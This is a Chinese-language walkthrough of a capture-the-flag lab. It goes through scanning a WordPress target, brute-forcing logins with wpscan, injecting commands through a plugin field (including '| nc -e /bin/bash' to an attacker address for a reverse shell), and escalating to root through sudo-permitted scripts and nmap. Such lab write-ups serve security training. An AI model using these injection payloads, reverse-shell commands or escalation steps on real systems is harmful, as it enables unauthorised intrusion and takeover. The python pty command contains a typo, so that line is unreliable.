与前面相同,在官网下载靶机,修改网卡为nat启动靶机,同时启动Kali使用Namp扫描主机
发现靶机地址,通过靶机地址扫描靶机系统与靶机开启的端口及服务
发现靶机开启了ssh服务22端口http服务80端口,使用浏览器访问靶机http服务
发现浏览器无法找不到该地址,尝试给本机添加路由后再次访问
成功访问并发现该浏览器有Wordpress搭建,没有搜集到其他信息,我们尝试使用drib扫描网站目录
发现有常见的账户参数,用浏览器打开
成功找到登录界面,有了登录界面开始寻找账户名及密码,使用wpscan扫描网站,查询账户名
成功找到五个账户名,将这五个账户名写入user.txt文件中,然后将wpscan中的密码包写入pass.txt中
有了账户与密码字典之后使用wpscan开始爆破
成功爆破出一对账户名与密码,尝试登录
成功登陆开始搜集信息
在网站中发现tools 插件,可以利用其漏洞。
用Burpsuite 抓包并在输入的内容以后加上| /etc/passwd ,查看返回数据,靶机成功执行该命令。这时我们打开Kali的nc监听
再次抓包,在提交的内容之后加上| nc -e /bin/bash 本机地址 设置的端口
t
提交之后查看是否成功链接
链接成功,尝试执行一下简单的命令是否能够成功
成功执行,我们执行python -c "import -c pty; pty.spawn('/bin/bash')"查看是否能获得一个交互界面
成功获得交互界面之后,逐个查看文件,最终在/home/mark下发现thing-to-do.txt中有用户graham的用户名密码,有了用户名和密码之后尝试登录
成功登陆,逐个查看文件,并执行sudo -l查看该用户可以以root身份执行的文件
发现该用户可以以Jens的身份执行jens 的backups.sh的文件,使用cat命令将该文件清空,并写入/bin/bash完成后以jens 的身份执行该文件并成功登陆
继续以jens 的身份查看文件,使用命令sudo -l查看可以使用的root命令
发现jens 能以root的身份执行Namp命令,使用Namp提权
成功提权获得root权限,并在root目录下找到flag